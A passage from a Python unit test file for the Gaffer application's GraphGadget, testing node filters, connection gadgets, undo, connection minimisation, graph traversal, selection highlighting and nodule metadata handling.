script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
nodeFilter = Gaffer.StandardSet( [ script["add1"] ] )
g = GafferUI.GraphGadget( script, nodeFilter )
self.failUnless( g.nodeGadget( script["add1"] ) )
self.failIf( g.nodeGadget( script["add2"] ) )
nodeFilter2 = Gaffer.StandardSet( [ script["add2"] ] )
g.setFilter( nodeFilter2 )
self.failIf( g.nodeGadget( script["add1"] ) )
self.failUnless( g.nodeGadget( script["add2"] ) )
def testChangingFilterAndEditingOriginal( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
nodeFilter = Gaffer.StandardSet()
g = GafferUI.GraphGadget( script, nodeFilter )
self.failIf( g.nodeGadget( script["add1"] ) )
self.failIf( g.nodeGadget( script["add2"] ) )
nodeFilter2 = Gaffer.StandardSet( [ script["add2"] ] )
g.setFilter( nodeFilter2 )
self.failIf( g.nodeGadget( script["add1"] ) )
self.failUnless( g.nodeGadget( script["add2"] ) )
nodeFilter.add( script["add1"] )
self.failIf( g.nodeGadget( script["add1"] ) )
self.failUnless( g.nodeGadget( script["add2"] ) )
def testConnectionsForNestedPlugs( self ) :
script = Gaffer.ScriptNode()
script["n"] = NestedPlugTestNode()
script["n"]["c"] = Gaffer.Plug()
script["n"]["c"]["i"] = Gaffer.IntPlug()
script["n2"] = NestedPlugTestNode()
script["n2"]["c"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out )
script["n2"]["c"]["o"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out )
script["n"]["c"]["i"].setInput( script["n2"]["c"]["o"] )
s = Gaffer.StandardSet( script.children() )
g = GafferUI.GraphGadget( script, s )
c = g.connectionGadget( script["n"]["c"]["i"] )
self.failUnless( c )
self.failUnless( c.srcNodule().plug().isSame( script["n2"]["c"]["o"] ) )
self.failUnless( c.dstNodule().plug().isSame( script["n"]["c"]["i"] ) )
s.remove( script["n2"] )
self.failUnless( g.nodeGadget( script["n2"] ) is None )
c = g.connectionGadget( script["n"]["c"]["i"] )
self.failUnless( c )
self.failUnless( c.srcNodule() is None )
self.failUnless( c.dstNodule().plug().isSame( script["n"]["c"]["i"] ) )
s.add( script["n2"] )
self.failUnless( g.nodeGadget( script["n2"] ) )
c = g.connectionGadget( script["n"]["c"]["i"] )
self.failUnless( c )
self.failUnless( c.srcNodule().plug().isSame( script["n2"]["c"]["o"] ) )
self.failUnless( c.dstNodule().plug().isSame( script["n"]["c"]["i"] ) )
s.remove( script["n"] )
self.failUnless( g.nodeGadget( script["n"] ) is None )
self.failUnless( g.connectionGadget( script["n"]["c"]["i"] ) is None )
s.add( script["n"] )
self.failUnless( g.nodeGadget( script["n"] ) )
c = g.connectionGadget( script["n"]["c"]["i"] )
self.failUnless( c )
self.failUnless( c.srcNodule().plug().isSame( script["n2"]["c"]["o"] ) )
self.failUnless( c.dstNodule().plug().isSame( script["n"]["c"]["i"] ) )
def testRemovePlugWithInputConnection( self ) :
script = Gaffer.ScriptNode()
script["n1"] = Gaffer.Node()
script["n2"] = Gaffer.Node()
script["n1"]["o"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out )
script["n2"]["i"] = Gaffer.IntPlug()
script["n2"]["i"].setInput( script["n1"]["o"] )
g = GafferUI.GraphGadget( script )
self.failUnless( g.connectionGadget( script["n2"]["i"] ) is not None )
with Gaffer.UndoScope( script ) :
removedPlug = script["n2"]["i"]
del script["n2"]["i"]
self.failUnless( g.connectionGadget( removedPlug ) is None )
script.undo()
self.failUnless( g.connectionGadget( script["n2"]["i"] ) is not None )
def testRemovePlugWithOutputConnection( self ) :
script = Gaffer.ScriptNode()
script["n1"] = Gaffer.Node()
script["n2"] = Gaffer.Node()
script["n1"]["o"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out )
script["n2"]["i"] = Gaffer.IntPlug()
script["n2"]["i"].setInput( script["n1"]["o"] )
g = GafferUI.GraphGadget( script )
self.failUnless( g.connectionGadget( script["n2"]["i"] ) is not None )
with Gaffer.UndoScope( script ) :
del script["n1"]["o"]
self.failUnless( g.connectionGadget( script["n2"]["i"] ) is None )
script.undo()
self.failUnless( g.connectionGadget( script["n2"]["i"] ) is not None )
def testConnectionBound( self ) :
for i in range( 0, 100 ) :
script = Gaffer.ScriptNode()
script["n1"] = Gaffer.Node()
script["n2"] = Gaffer.Node()
script["n1"]["o"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out )
script["n2"]["i"] = Gaffer.IntPlug()
script["n2"]["i"].setInput( script["n1"]["o"] )
g = GafferUI.GraphGadget( script )
c = g.connectionGadget( script["n2"]["i"] )
gb = imath.Box3f()
gb.extendBy( g.nodeGadget( script["n1"] ).bound() )
gb.extendBy( g.nodeGadget( script["n2"] ).bound() )
gb.setMin( gb.min() - imath.V3f( 10 ) )
gb.setMax( gb.max() + imath.V3f( 10 ) )
b = c.bound()
self.failIf( b.isEmpty() )
self.failUnless( IECore.BoxAlgo.contains( gb, b ) )
def testNoFilter( self ) :
s = Gaffer.ScriptNode()
s["n1"] = Gaffer.Node()
g = GafferUI.GraphGadget( s )
self.assertTrue( g.getRoot().isSame( s ) )
self.assertTrue( g.getFilter() is None )
self.assertTrue( g.nodeGadget( s["n1"] ) )
s["n2"] = Gaffer.Node()
self.assertTrue( g.nodeGadget( s["n1"] ) )
def testFilterIsChildSet( self ) :
s = Gaffer.ScriptNode()
s["n1"] = Gaffer.Node()
g = GafferUI.GraphGadget( s, Gaffer.ChildSet( s ) )
self.assertTrue( g.nodeGadget( s["n1"] ) )
l = len( g )
s["n2"] = Gaffer.Node()
self.assertTrue( g.nodeGadget( s["n2"] ) )
self.assertEqual( len( g ), l + 1 )
def testSetRoot( self ) :
s = Gaffer.ScriptNode()
s["b"] = Gaffer.Box()
s["b"]["n"] = Gaffer.Node()
f = Gaffer.StandardSet( [ s["b"] ] )
g = GafferUI.GraphGadget( s, f )
self.assertTrue( g.nodeGadget( s["b"] ) )
self.assertFalse( g.nodeGadget( s["b"]["n"] ) )
g.setRoot( s["b"] )
self.assertTrue( g.getRoot().isSame( s["b"] ) )
self.assertEqual( g.getFilter(), None )
self.assertTrue( g.nodeGadget( s["b"]["n"] ) )
self.assertFalse( g.nodeGadget( s["b"] ) )
def testRootChangedSignal( self ) :
s = Gaffer.ScriptNode()
s["b"] = Gaffer.Box()
roots = []
previousRoots = []
def f( gg, previousRoot ) :
self.failUnless( gg.isSame( g ) )
roots.append( gg.getRoot() )
previousRoots.append( previousRoot )
g = GafferUI.GraphGadget( s )
c = g.rootChangedSignal().connect( f )
self.assertEqual( len( roots ), 0 )
self.assertEqual( len( previousRoots ), 0 )
g.setRoot( s["b"] )
self.assertEqual( len( roots ), 1 )
self.assertTrue( roots[0].isSame( s["b"] ) )
self.assertEqual( len( previousRoots ), 1 )
self.assertTrue( previousRoots[0].isSame( s ) )
g.setRoot( s["b"] )
self.assertEqual( len( roots ), 1 )
self.assertTrue( roots[0].isSame( s["b"] ) )
self.assertEqual( len( previousRoots ), 1 )
self.assertTrue( previousRoots[0].isSame( s ) )
g.setRoot( s )
self.assertEqual( len( roots ), 2 )
self.assertTrue( roots[1].isSame( s ) )
self.assertEqual( len( previousRoots ), 2 )
self.assertTrue( previousRoots[1].isSame( s["b"] ) )
def testSetNodePosition( self ) :
s = Gaffer.ScriptNode()
s["n"] = Gaffer.Node()
g = GafferUI.GraphGadget( s )
self.assertFalse( g.hasNodePosition( s["n"] ) )
g.setNodePosition( s["n"], imath.V2f( -100, 2000 ) )
self.assertEqual( g.getNodePosition( s["n"] ), imath.V2f( -100, 2000 ) )
self.assertTrue( g.hasNodePosition( s["n"] ) )
def testPlugConnectionGadgets( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
script["add3"] = GafferTest.AddNode()
script["add4"] = GafferTest.AddNode()
script["add2"]["op1"].setInput( script["add1"]["sum"] )
script["add3"]["op1"].setInput( script["add2"]["sum"] )
script["add4"]["op2"].setInput( script["add2"]["sum"] )
g = GafferUI.GraphGadget( script )
c = g.connectionGadgets( script["add1"]["sum"] )
self.assertEqual( len( c ), 1 )
self.assertTrue( c[0].srcNodule().plug().isSame( script["add1"]["sum"] ) )
self.assertTrue( c[0].dstNodule().plug().isSame( script["add2"]["op1"] ) )
c = g.connectionGadgets( script["add1"]["sum"], excludedNodes = Gaffer.StandardSet( [ script["add2"] ] ) )
self.assertEqual( len( c ), 0 )
c = g.connectionGadgets( script["add2"]["sum"] )
self.assertEqual( len( c ), 2 )
self.assertTrue( c[0].srcNodule().plug().isSame( script["add2"]["sum"] ) )
self.assertTrue( c[0].dstNodule().plug().isSame( script["add3"]["op1"] ) )
self.assertTrue( c[1].srcNodule().plug().isSame( script["add2"]["sum"] ) )
self.assertTrue( c[1].dstNodule().plug().isSame( script["add4"]["op2"] ) )
c = g.connectionGadgets( script["add2"]["sum"], excludedNodes = Gaffer.StandardSet( [ script["add3"] ] ) )
self.assertEqual( len( c ), 1 )
self.assertTrue( c[0].srcNodule().plug().isSame( script["add2"]["sum"] ) )
self.assertTrue( c[0].dstNodule().plug().isSame( script["add4"]["op2"] ) )
def testNodeConnectionGadgets( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
script["add3"] = GafferTest.AddNode()
script["add4"] = GafferTest.AddNode()
script["add2"]["op1"].setInput( script["add1"]["sum"] )
script["add3"]["op1"].setInput( script["add2"]["sum"] )
script["add4"]["op2"].setInput( script["add2"]["sum"] )
g = GafferUI.GraphGadget( script )
c = g.connectionGadgets( script["add1"] )
self.assertEqual( len( c ), 1 )
self.assertTrue( c[0].srcNodule().plug().isSame( script["add1"]["sum"] ) )
self.assertTrue( c[0].dstNodule().plug().isSame( script["add2"]["op1"] ) )
c = g.connectionGadgets( script["add1"], excludedNodes = Gaffer.StandardSet( [ script["add2"] ] ) )
self.assertEqual( len( c ), 0 )
c = g.connectionGadgets( script["add2"] )
self.assertEqual( len( c ), 3 )
self.assertTrue( c[0].srcNodule().plug().isSame( script["add1"]["sum"] ) )
self.assertTrue( c[0].dstNodule().plug().isSame( script["add2"]["op1"] ) )
self.assertTrue( c[1].srcNodule().plug().isSame( script["add2"]["sum"] ) )
self.assertTrue( c[1].dstNodule().plug().isSame( script["add3"]["op1"] ) )
self.assertTrue( c[2].srcNodule().plug().isSame( script["add2"]["sum"] ) )
self.assertTrue( c[2].dstNodule().plug().isSame( script["add4"]["op2"] ) )
c = g.connectionGadgets( script["add2"], excludedNodes = Gaffer.StandardSet( [ script["add3"] ] ) )
self.assertEqual( len( c ), 2 )
self.assertTrue( c[0].srcNodule().plug().isSame( script["add1"]["sum"] ) )
self.assertTrue( c[0].dstNodule().plug().isSame( script["add2"]["op1"] ) )
self.assertTrue( c[1].srcNodule().plug().isSame( script["add2"]["sum"] ) )
self.assertTrue( c[1].dstNodule().plug().isSame( script["add4"]["op2"] ) )
def testInternalConnectionsNotShown( self ) :
# make sure they're not shown when they exist before graph visualisation
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add1"]["sum"].setInput( script["add1"]["op1"] )
script["add1"]["op1"].setInput( script["add1"]["op2"] )
g = GafferUI.GraphGadget( script )
self.assertEqual( len( g.connectionGadgets( script["add1"] ) ), 0 )
self.assertEqual( g.connectionGadget( script["add1"]["sum"] ), None )
self.assertEqual( g.connectionGadget( script["add1"]["op1"] ), None )
self.assertEqual( g.connectionGadget( script["add1"]["op2"] ), None )
# make sure they're not shown when they're made after graph visualisation
script = Gaffer.ScriptNode()
g = GafferUI.GraphGadget( script )
script["add1"] = GafferTest.AddNode()
script["add1"]["sum"].setInput( script["add1"]["op1"] )
script["add1"]["op1"].setInput( script["add1"]["op2"] )
self.assertEqual( len( g.connectionGadgets( script["add1"] ) ), 0 )
self.assertEqual( g.connectionGadget( script["add1"]["sum"] ), None )
self.assertEqual( g.connectionGadget( script["add1"]["op1"] ), None )
self.assertEqual( g.connectionGadget( script["add1"]["op2"] ), None )
def testConnectionMinimisedAccessors( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
script["add3"] = GafferTest.AddNode()
script["add2"]["op1"].setInput( script["add1"]["sum"] )
script["add3"]["op1"].setInput( script["add2"]["sum"] )
g = GafferUI.GraphGadget( script )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add1"] ) )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add2"] ) )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add3"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add1"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add2"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add3"] ) )
g.setNodeInputConnectionsMinimised( script["add3"], True )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add1"] ) )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add2"] ) )
self.assertTrue( g.getNodeInputConnectionsMinimised( script["add3"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add1"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add2"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add3"] ) )
g.setNodeOutputConnectionsMinimised( script["add2"], True )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add1"] ) )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add2"] ) )
self.assertTrue( g.getNodeInputConnectionsMinimised( script["add3"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add1"] ) )
self.assertTrue( g.getNodeOutputConnectionsMinimised( script["add2"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add3"] ) )
g.setNodeOutputConnectionsMinimised( script["add2"], False )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add1"] ) )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add2"] ) )
self.assertTrue( g.getNodeInputConnectionsMinimised( script["add3"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add1"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add2"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add3"] ) )
g.setNodeInputConnectionsMinimised( script["add3"], False )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add1"] ) )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add2"] ) )
self.assertFalse( g.getNodeInputConnectionsMinimised( script["add3"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add1"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add2"] ) )
self.assertFalse( g.getNodeOutputConnectionsMinimised( script["add3"] ) )
def testConnectionMinimisation( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
script["add3"] = GafferTest.AddNode()
g = GafferUI.GraphGadget( script )
g.setNodeOutputConnectionsMinimised( script["add1"], True )
script["add2"]["op1"].setInput( script["add1"]["sum"] )
c1 = g.connectionGadget( script["add2"]["op1"] )
self.assertTrue( c1.getMinimised() )
script["add3"]["op1"].setInput( script["add2"]["sum"] )
c2 = g.connectionGadget( script["add3"]["op1"] )
self.assertFalse( c2.getMinimised() )
g.setNodeInputConnectionsMinimised( script["add2"], True )
self.assertTrue( c1.getMinimised() )
self.assertFalse( c2.getMinimised() )
g.setNodeOutputConnectionsMinimised( script["add1"], False )
self.assertTrue( c1.getMinimised() )
self.assertFalse( c2.getMinimised() )
g.setNodeInputConnectionsMinimised( script["add2"], False )
self.assertFalse( c1.getMinimised() )
self.assertFalse( c2.getMinimised() )
def testNodeGadgetCreatorReturningNull( self ) :
class InvisibleNode( GafferTest.AddNode ) :
def __init__( self, name = "InvisibleNode" ) :
GafferTest.AddNode.__init__( self, name )
IECore.registerRunTimeTyped( InvisibleNode )
GafferUI.NodeGadget.registerNodeGadget( InvisibleNode, lambda node : None )
script = Gaffer.ScriptNode()
g = GafferUI.GraphGadget( script )
script["n1"] = InvisibleNode()
script["n2"] = InvisibleNode()
self.assertEqual( g.nodeGadget( script["n1"] ), None )
self.assertEqual( g.nodeGadget( script["n2"] ), None )
script["n2"]["op1"].setInput( script["n1"]["sum"] )
self.assertEqual( g.connectionGadget( script["n2"]["op1"] ), None )
# in case it wasn't clear, hiding the nodes has zero
# effect on their computations.
script["n1"]["op1"].setValue( 12 )
script["n1"]["op2"].setValue( 13 )
script["n2"]["op2"].setValue( 100 )
self.assertEqual( script["n2"]["sum"].getValue(), 125 )
def testUpstreamNodeGadgets( self ) :
script = Gaffer.ScriptNode()
# a -> b -> c -> e -> f
# ^
# |
# d
script["a"] = GafferTest.AddNode()
script["b"] = GafferTest.AddNode()
script["c"] = GafferTest.AddNode()
script["d"] = GafferTest.AddNode()
script["e"] = GafferTest.AddNode()
script["f"] = GafferTest.AddNode()
script["b"]["op1"].setInput( script["a"]["sum"] )
script["c"]["op1"].setInput( script["b"]["sum"] )
script["c"]["op2"].setInput( script["d"]["sum"] )
script["e"]["op1"].setInput( script["c"]["sum"] )
script["f"]["op1"].setInput( script["e"]["sum"] )
g = GafferUI.GraphGadget( script )
u = [ x.node().relativeName( script ) for x in g.upstreamNodeGadgets( script["c"] ) ]
self.assertEqual( len( u ), 3 )
self.assertEqual( set( u ), set( [ "a", "b", "d" ] ) )
u = [ x.node().relativeName( script ) for x in g.upstreamNodeGadgets( script["f"] ) ]
self.assertEqual( len( u ), 5 )
self.assertEqual( set( u ), set( [ "a", "b", "d", "c", "e" ] ) )
# the degreesOfSeparation argument should limit the depth
# of the search.
u = [ x.node().relativeName( script ) for x in g.upstreamNodeGadgets( script["c"], degreesOfSeparation = 1 ) ]
self.assertEqual( len( u ), 2 )
self.assertEqual( set( u ), set( [ "b", "d" ] ) )
# filtered nodes should be ignored
g.setFilter( Gaffer.StandardSet( [ script["f"], script["e"], script["a"] ] ) )
u = [ x.node().relativeName( script ) for x in g.upstreamNodeGadgets( script["f"] ) ]
self.assertEqual( u, [ "e" ] )
def testDownstreamNodeGadgets( self ) :
script = Gaffer.ScriptNode()
# a -> b -> c -> e -> f
# |
# v
# d
script["a"] = GafferTest.AddNode()
script["b"] = GafferTest.AddNode()
script["c"] = GafferTest.AddNode()
script["d"] = GafferTest.AddNode()
script["e"] = GafferTest.AddNode()
script["f"] = GafferTest.AddNode()
script["b"]["op1"].setInput( script["a"]["sum"] )
script["c"]["op1"].setInput( script["b"]["sum"] )
script["d"]["op1"].setInput( script["c"]["sum"] )
script["e"]["op1"].setInput( script["c"]["sum"] )
script["f"]["op1"].setInput( script["e"]["sum"] )
g = GafferUI.GraphGadget( script )
u = [ x.node().relativeName( script ) for x in g.downstreamNodeGadgets( script["b"] ) ]
self.assertEqual( len( u ), 4 )
self.assertEqual( set( u ), set( [ "c", "d", "e", "f" ] ) )
u = [ x.node().relativeName( script ) for x in g.downstreamNodeGadgets( script["e"] ) ]
self.assertEqual( len( u ), 1 )
self.assertEqual( set( u ), set( [ "f" ] ) )
u = [ x.node().relativeName( script ) for x in g.downstreamNodeGadgets( script["c"], degreesOfSeparation = 1 ) ]
self.assertEqual( len( u ), 2 )
self.assertEqual( set( u ), set( [ "d", "e" ] ) )
def testConnectedNodeGadgets( self ) :
script = Gaffer.ScriptNode()
# a -> b -> c -> e -> f
# |
# v
# d
script["a"] = GafferTest.AddNode()
script["b"] = GafferTest.AddNode()
script["c"] = GafferTest.AddNode()
script["d"] = GafferTest.AddNode()
script["e"] = GafferTest.AddNode()
script["f"] = GafferTest.AddNode()
script["b"]["op1"].setInput( script["a"]["sum"] )
script["c"]["op1"].setInput( script["b"]["sum"] )
script["d"]["op1"].setInput( script["c"]["sum"] )
script["e"]["op1"].setInput( script["c"]["sum"] )
script["f"]["op1"].setInput( script["e"]["sum"] )
g = GafferUI.GraphGadget( script )
# test traversing in both directions
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["b"] ) ]
self.assertEqual( set( u ), set( [ "a", "c", "d", "e", "f" ] ) )
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["e"] ) ]
self.assertEqual( set( u ), set( [ "a", "b", "c", "d", "f" ] ) )
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["c"], degreesOfSeparation = 1 ) ]
self.assertEqual( set( u ), set( [ "b", "d", "e" ] ) )
# test traversing upstream
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["c"], direction = Gaffer.Plug.Direction.In ) ]
self.assertEqual( set( u ), set( [ "a", "b" ] ) )
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["c"], direction = Gaffer.Plug.Direction.In, degreesOfSeparation = 1 ) ]
self.assertEqual( set( u ), set( [ "b" ] ) )
# test traversing downstream
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["c"], direction = Gaffer.Plug.Direction.Out ) ]
self.assertEqual( set( u ), set( [ "d", "e", "f" ] ) )
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["c"], direction = Gaffer.Plug.Direction.Out, degreesOfSeparation = 1 ) ]
self.assertEqual( set( u ), set( [ "d", "e" ] ) )
# test that invisible nodes are ignored
g.setFilter( Gaffer.StandardSet( [ script["f"], script["e"], script["c"] ] ) )
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["e"] ) ]
self.assertEqual( set( u ), set( [ "f", "c" ] ) )
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["e"], direction = Gaffer.Plug.Direction.In ) ]
self.assertEqual( set( u ), set( [ "c" ] ) )
u = [ x.node().relativeName( script ) for x in g.connectedNodeGadgets( script["e"], direction = Gaffer.Plug.Direction.Out ) ]
self.assertEqual( set( u ), set( [ "f" ] ) )
def testSelectionHighlighting( self ) :
script = Gaffer.ScriptNode()
script["a"] = GafferTest.AddNode()
script["b"] = GafferTest.AddNode()
script.selection().add( script["a"] )
g = GafferUI.GraphGadget( script )
self.assertTrue( g.nodeGadget( script["a"] ).getHighlighted() )
self.assertFalse( g.nodeGadget( script["b"] ).getHighlighted() )
script.selection().add( script["b"] )
self.assertTrue( g.nodeGadget( script["a"] ).getHighlighted() )
self.assertTrue( g.nodeGadget( script["b"] ).getHighlighted() )
script.selection().remove( script["a"] )
self.assertFalse( g.nodeGadget( script["a"] ).getHighlighted() )
self.assertTrue( g.nodeGadget( script["b"] ).getHighlighted() )
script.selection().clear()
self.assertFalse( g.nodeGadget( script["a"] ).getHighlighted() )
self.assertFalse( g.nodeGadget( script["b"] ).getHighlighted() )
def testNoDuplicatePositionPlugsAfterPasting( self ) :
script = Gaffer.ScriptNode()
script["n"] = Gaffer.Node()
g = GafferUI.GraphGadget( script )
g.setNodePosition( script["n"], imath.V2f( 1, 2 ) )
self.assertTrue( g.hasNodePosition( script["n"] ) )
script.execute( script.serialise( script, Gaffer.StandardSet( [ script["n"] ] ) ) )
self.assertTrue( "__uiPosition" in script["n1"] )
self.assertFalse( "__uiPosition1" in script["n1"] )
def testErrorAndDelete( self ) :
# Create a script with a dodgy node,
# and a GraphGadget for displaying it.
script = Gaffer.ScriptNode()
script["n"] = GafferTest.BadNode()
graphGadget = GafferUI.GraphGadget( script )
# Arrange for the node to error on
# a background thread.
def f() :
with IECore.IgnoredExceptions( Exception ) :
script["n"]["out1"].getValue()
r = threading.Thread( target = f )
r.start()
r.join()
# Delete the node on the
# foreground thread - this will
# remove the NodeGadget inside
# the GraphGadget.
del script["n"]
# Run idle events. Woe betide any NodeGadget
# implementation assuming it will still be
# alive at arbitrary points in the future!
self.waitForIdle( 1000 )
def testMovePlugWithInputConnection( self ) :
script = Gaffer.ScriptNode()
script["n1"] = Gaffer.Node()
script["n1"]["p"] = Gaffer.Plug()
script["n2"] = Gaffer.Node()
script["n2"]["p"] = Gaffer.Plug()
script["n2"]["p"].setInput( script["n1"]["p"] )
g = GafferUI.GraphGadget( script )
script["n3"] = Gaffer.Node()
script["n3"]["p"] = script["n2"]["p"]
connection = g.connectionGadget( script["n3"]["p"] )
dstNodule = connection.dstNodule()
srcNodule = connection.srcNodule()
self.assertTrue( dstNodule.plug().isSame( script["n3"]["p"] ) )
self.assertTrue( srcNodule.plug().isSame( script["n1"]["p"] ) )
self.assertTrue( g.nodeGadget( script["n1"] ).isAncestorOf( srcNodule ) )
self.assertTrue( g.nodeGadget( script["n3"] ).isAncestorOf( dstNodule ) )
def testMovePlugWithInputConnectionOutsideGraph( self ) :
script = Gaffer.ScriptNode()
script["n1"] = Gaffer.Node()
script["n1"]["p"] = Gaffer.Plug()
script["n2"] = Gaffer.Node()
script["n2"]["p"] = Gaffer.Plug()
script["n2"]["p"].setInput( script["n1"]["p"] )
g = GafferUI.GraphGadget( script )
n3 = Gaffer.Node()
n3["p"] = script["n2"]["p"]
self.assertEqual( g.connectionGadget( n3["p"] ), None )
def testRemoveNoduleWithInputConnection( self ) :
script = Gaffer.ScriptNode()
script["n1"] = Gaffer.Node()
script["n1"]["p"] = Gaffer.Plug()
script["n2"] = Gaffer.Node()
script["n2"]["p"] = Gaffer.Plug()
script["n2"]["p"].setInput( script["n1"]["p"] )
g = GafferUI.GraphGadget( script )
self.assertTrue( g.nodeGadget( script["n2"] ).nodule( script["n2"]["p"] ) is not None )
self.assertTrue( g.connectionGadget( script["n2"]["p"] ) is not None )
Gaffer.Metadata.registerValue( script["n2"]["p"], "nodule:type", "" )
self.assertTrue( g.nodeGadget( script["n2"] ).nodule( script["n2"]["p"] ) is None )
self.assertTrue( g.connectionGadget( script["n2"]["p"] ) is None )
def testRemoveNoduleWithOutputConnections( self ) :
script = Gaffer.ScriptNode()
script["n1"] = Gaffer.Node()
script["n1"]["out"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out )
script["n2"] = Gaffer.Node()
script["n2"]["in"] = Gaffer.Plug()
script["n2"]["in"].setInput( script["n1"]["out"] )
g = GafferUI.GraphGadget( script )
c = g.connectionGadget( script["n2"]["in"] )
self.assertTrue( c is not None )
self.assertTrue( c.srcNodule().plug().isSame( script["n1"]["out"] ) )
self.assertTrue( c.dstNodule().plug().isSame( script["n2"]["in"] ) )
Gaffer.Metadata.registerValue( script["n1"]["out"], "nodule:type", "" )
c = g.connectionGadget( script["n2"]["in"] )
self.assertTrue( c is not None )
self.assertTrue( c.srcNodule() is None )
self.assertTrue( c.dstNodule().plug().isSame( script["n2"]["in"] ) )
Gaffer.Metadata.registerValue( script["n1"]["out"], "nodule:type", "GafferUI::StandardNodule" )
c = g.connectionGadget( script["n2"]["in"] )
self.assertTrue( c is not None )
self.assertTrue( c.srcNodule().plug().isSame( script["n1"]["out"] ) )
self.assertTrue( c.dstNodule().plug().isSame( script["n2"]["in"] ) )
def testAddNoduleWithInputConnection( self ) :
script = Gaffer.ScriptNode()
script["n"] = Gaffer.Node()
script["n"]["in"] = Gaffer.Plug()
script["n"]["out"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out )
script["n"]["out"].setInput( script["n"]["in"] )
Gaffer.Metadata.registerValue( script["n"]["out"], "nodule:type", "" )
g = GafferUI.GraphGadget( script )
self.assertTrue( g.nodeGadget( script["n"] ).nodule( script["n"]["out"] ) is None )
self.assertTrue( g.connectionGadget( script["n"]["out"] ) is None )
Gaffer.Metadata.registerValue( script["n"]["out"], "nodule:type", "GafferUI::StandardNodule" )
self.assertTrue( g.nodeGadget( script["n"] ).nodule( script["n"]["out"] ) is not None )
self.assertTrue( g.connectionGadget( script["n"]["out"] ) is None )
def testAddNoduleWithOutputConnection( self ) :
script = Gaffer.ScriptNode()
script["n1"] = Gaffer.Node()
script["n1"]["out"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out )
script["n2"] = Gaffer.Node()
script["n2"]["in"] = Gaffer.Plug()
script["n2"]["in"].setInput( script["n1"]["out"] )
Gaffer.Metadata.registerValue( script["n1"]["out"], "nodule:type", "" )
g = GafferUI.GraphGadget( script )
self.assertTrue( g.nodeGadget( script["n1"] ).nodule( script["n1"]["out"] ) is None )
self.assertTrue( g.connectionGadget( script["n2"]["in"] ) is not None )
self.assertTrue( g.connectionGadget( script["n2"]["in"] ).srcNodule() is None )
Gaffer.Metadata.registerValue( script["n1"]["out"], "nodule:type", "GafferUI::StandardNodule" )
self.assertTrue( g.nodeGadget( script["n1"] ).nodule( script["n1"]["out"] ) is not None )
self.assertTrue( g.connectionGadget( script["n2"]["in"] ) is not None )
self.assertTrue( g.connectionGadget( script["n2"]["in"] ).srcNodule() is not None )
def testRemoveNonNodulePlug( self ) :
s = Gaffer.ScriptNode()
s["n"] = Gaffer.Node()
s["n"]["p"] = Gaffer.Plug()
Gaffer.Metadata.registerValue( s["n"]["p"], "nodule:type", "" )
g = GafferUI.GraphGadget( s )
self.assertTrue( g.nodeGadget( s["n"] ).nodule( s["n"]["p"] ) is None )
# Once upon a time, this would crash.
del s["n"]["p"]
def testEnabledException( self ) :
s = Gaffer.ScriptNode()
s["n"] = GafferTest.AddNode()
s["e"] = Gaffer.Expression()
s["e"].setExpression( "parent['n']['enabled'] = undefinedVariable" )
g = GafferUI.GraphGadget( s )
self.assertTrue( g.nodeGadget( s["n"] ) is not None )
def testLayoutAccessors( self ) :
s = Gaffer.ScriptNode()
g = GafferUI.GraphGadget( s )
l = g.getLayout()
self.assertTrue( isinstance( l, GafferUI.StandardGraphLayout ) )
l2 = GafferUI.StandardGraphLayout()
g.setLayout( l2 )
self.assertTrue( g.getLayout().isSame( l2 ) )
g.setLayout( l )
self.assertTrue( g.getLayout().isSame( l ) )
def testUnpositionedNodeGadgets( self ) :
